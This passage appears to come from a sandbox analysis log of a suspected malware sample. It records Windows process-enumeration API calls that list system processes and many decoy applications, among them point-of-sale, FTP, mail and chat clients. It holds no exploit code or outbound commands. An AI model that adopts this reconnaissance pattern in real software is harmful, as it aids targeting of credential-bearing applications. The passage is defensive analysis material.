th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0237.858] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0237.860] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0237.862] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0237.864] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0237.866] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0237.868] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0237.870] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.872] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0237.875] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x25c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="bcatcih")) returned 1 [0237.878] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0237.880] Process32Next (in: hSnapshot=0x2290, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 0 [0237.882] CloseHandle (hObject=0x2290) returned 1 [0237.882] Sleep (dwMilliseconds=0x64) [0238.077] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x2298 [0238.093] Process32First (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0238.095] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x76, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0238.096] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0238.098] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.100] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0238.103] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0238.104] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0238.106] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0238.108] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0238.110] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.209] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.212] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0238.215] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.218] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.220] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.223] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.225] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.228] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x49, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.231] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.233] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0238.236] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0238.240] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x31, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0238.243] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0238.306] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.309] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0238.311] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0238.313] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0238.315] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0238.318] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0238.320] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0238.322] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.325] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.328] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0238.330] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0238.336] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0238.339] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.341] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0238.388] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0238.390] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0238.395] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0238.399] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0238.401] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0238.404] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0238.408] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0238.410] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0238.413] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0238.415] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0238.418] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0238.420] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0238.423] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0238.431] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0238.433] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0238.437] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0238.440] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0238.443] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0238.446] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0238.449] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0238.451] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0238.454] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0238.458] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0238.461] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0238.464] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0238.473] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0238.476] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0238.481] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0238.485] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0238.488] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0238.491] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0238.494] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0238.496] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0238.499] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0238.502] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="pidgin.exe")) returned 1 [0238.505] Process32Next (in: hSnapshot=0x2298, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, 